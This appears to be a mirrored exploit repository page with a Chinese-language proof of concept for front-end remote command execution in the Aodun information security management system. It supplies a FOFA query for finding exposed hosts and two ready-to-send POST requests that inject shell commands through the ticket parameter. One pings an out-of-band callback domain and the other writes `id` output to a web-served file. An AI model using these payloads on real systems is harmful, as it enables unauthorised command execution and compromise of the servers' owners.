admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/傲盾网络科技股份有限公司/傲盾信息安全管理系统前台远程命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

57 lines
2.4 KiB
Markdown
Raw Blame History

# 傲盾信息安全管理系统前台远程命令执行漏洞
# 一、漏洞简介
傲盾信息安全管理系统是傲盾网络科技股份有限公司的一个信息安全管理产品。该系统的前台存在远程命令执行漏洞,远程攻击者可以构造特殊的请求,注入系统命令,由于过滤不足,导致成功在目标服务器执行任意系统命令。 ,该远程命令执行漏洞的利用难度低,可导致远程命令执行。
# 二、影响版本
+ 傲盾信息安全管理系统
# 三、资产测绘
+ fofa`body="傲盾软件" && body="aodun/aodun.js"`
+ 特征
![1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842.png](./img/iKy_I61sKHi42MYu/1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842-462573.png)
# 四、漏洞复现
```java
POST /user_management/sichuan_login HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
loginname=sysadmin&ticket=|ping tiqqklzooy.iyhc.eu.org
```
![1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9.png](./img/iKy_I61sKHi42MYu/1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9-169168.png)
```java
POST /user_management/sichuan_login HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
loginname=sysadmin&ticket=|echo `id` > /adm/isms_web/static/base_static/js/aodun/1.txt
```
![1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578.png](./img/iKy_I61sKHi42MYu/1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578-034254.png)
```java
/static/base_static/js/aodun/1.txt
```
![1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4.png](./img/iKy_I61sKHi42MYu/1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4-639030.png)
> 更新: 2024-12-20 14:54:44
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sdu622si610nmpvy>
Reference in New Issue View Git Blame Copy Permalink